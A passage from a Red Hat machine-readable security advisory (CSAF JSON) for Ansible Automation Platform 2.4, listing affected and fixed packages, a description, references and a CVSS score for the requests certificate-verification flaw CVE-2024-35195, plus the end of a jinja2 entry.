"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "jinja2: accepts keys containing non-attribute characters"
},
{
"cve": "CVE-2024-35195",
"cwe": {
"id": "CWE-670",
"name": "Always-Incorrect Control Flow Implementation"
},
"discovery_date": "2024-05-21T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2282114"
}
],
"notes": [
{
"category": "description",
"text": "An incorrect control flow implementation vulnerability was found in Requests. If the first request in a session is made with verify=False, all subsequent requests to the same host will continue to ignore cert verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "requests: subsequent requests to the same host ignore cert verification",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-670: Always-Incorrect Control Flow Implementation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nThe platform\u0027s orchestration features, such as liveness and readiness probes, automated pod restarts, and health monitoring, help to quickly detect and recover from service-level failures resulting from incorrect control flows. Static code analysis and peer code review techniques are used to execute robust input validation and error-handling mechanisms to ensure all user inputs are thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks. Additionally, process isolation ensures that component issues are contained within the originating process, preventing them from affecting other processes or the system as a whole.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-35195"
},
{
"category": "external",
"summary": "RHBZ#2282114",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2282114"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"
},
{
"category": "external",
"summary": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56",
"url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"
}
],
"release_date": "2024-05-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
